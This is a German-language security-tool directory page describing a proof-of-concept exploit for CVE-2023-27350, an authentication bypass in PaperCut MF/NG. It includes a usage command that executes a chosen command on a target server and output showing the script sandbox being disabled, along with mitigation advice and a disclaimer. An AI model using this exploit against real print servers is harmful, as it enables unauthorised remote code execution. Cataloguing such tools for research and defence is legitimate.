Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-27350 — Papercut Sicherheitslücke, Betroffene Versionen sind PaperCut MF oder NG Version 8.0 oder später (ausgenommen gepatchte Versionen) auf allen Betriebssystemplattformen. | Kitploit
Tools/GitHubGitHub/royall-researchers/cve-2023-27350
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

Papercut Sicherheitslücke, Betroffene Versionen sind PaperCut MF oder NG Version 8.0 oder später (ausgenommen gepatchte Versionen) auf allen Betriebssystemplattformen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
4vor 1 JahrNoch nicht geprüft

CVE-2023-27350

POC für CVE-2023-27350, der PaperCut MF/NG betrifft

##Betroffene Versionen 'PaperCut MF or NG version 8.0 or later (excluding patched versions) on all OS platforms.'

Zusammenfassung

Dieser POC nutzt eine Authentifizierungsumgehungsschwachstelle, die mit dem Missbrauch der integrierten Skriptfunktionalität verkettet ist, um Code auszuführen.

Verwendung

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Gegenmaßnahmen

Aktualisieren Sie auf die neueste Version oder führen Sie die Gegenmaßnahmen gemäß den Anweisungen im PaperCut-Sicherheitshinweis durch

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

Haftungsausschluss

Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt. Sie ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich genehmigt wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für den Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.

Tool herunterladen